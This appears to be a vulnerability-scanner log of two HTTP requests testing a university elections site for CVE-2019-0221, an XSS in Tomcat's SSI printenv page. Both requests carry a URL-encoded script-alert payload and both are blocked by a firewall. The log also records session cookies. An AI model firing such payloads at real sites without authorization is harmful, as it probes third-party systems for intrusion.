[CVE-2019-0221] Dumped HTTP request for https://elections.union.unimelb.edu.au/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E


GET /printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E HTTP/1.1
Host: elections.union.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2019-0221] Dumped HTTP response https://elections.union.unimelb.edu.au/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 829
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3220071=CxhaX/GHTBiqJXEJUkA8gwtyk2gAAAAAQUIPAAAAAACAAho8HxgsWfya1EchLV5C; expires=Thu, 06 Aug 2026 07:06:48 GMT; HttpOnly; path=/; Domain=.union.unimelb.edu.au; Secure; SameSite=None
Set-Cookie: incap_ses_237_3220071=G2EMdG2Z1jgE57arov5JAwtyk2gAAAAAd74KIBJA673oet6Me3uNyA==; path=/; Domain=.union.unimelb.edu.au; Secure; SameSite=None
Strict-Transport-Security: max-age=31536000
X-Iinfo: 1-1018935-0 0NNN RT(1754493451426 21) q(0 -1 -1 -1) r(0 -1) B15(1,502,52) U24

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/alband-Then-now-not-by-the-wortune-Vpon-his-Fee-" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=1-1018935-0%200NNN%20RT%281754493451426%2021%29%20q%280%20-1%20-1%20-1%29%20r%280%20-1%29%20B15%281%2c502%2c52%29%20U24&incident_id=237000430032586535-11527816792050369&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032586535-11527816792050369</iframe></body></html>
[CVE-2019-0221] Dumped HTTP request for https://elections.union.unimelb.edu.au/ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E


GET /ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E HTTP/1.1
Host: elections.union.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: visid_incap_3220071=CxhaX/GHTBiqJXEJUkA8gwtyk2gAAAAAQUIPAAAAAACAAho8HxgsWfya1EchLV5C; incap_ses_237_3220071=G2EMdG2Z1jgE57arov5JAwtyk2gAAAAAd74KIBJA673oet6Me3uNyA==
Accept-Encoding: gzip


[CVE-2019-0221] Dumped HTTP response https://elections.union.unimelb.edu.au/ssi/printenv.shtml?%3Cscript%3Ealert(526650718)%3C%2Fscript%3E

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 937
Cache-Control: no-cache, no-store
Content-Type: text/html
Strict-Transport-Security: max-age=31536000
X-Iinfo: 10-8313889-0 0NNN RT(1754493451462 7) q(0 -1 -1 0) r(0 -1) B15(1,502,52) U24

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script type="text/javascript" src="/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3"></script><script src="/alband-Then-now-not-by-the-wortune-Vpon-his-Fee-" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=10-8313889-0%200NNN%20RT%281754493451462%207%29%20q%280%20-1%20-1%200%29%20r%280%20-1%29%20B15%281%2c502%2c52%29%20U24&incident_id=237000430032709380-42328328646757066&edet=15&cinfo=01000000&rpinfo=0&mth=GET" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 237000430032709380-42328328646757066</iframe></body></html>
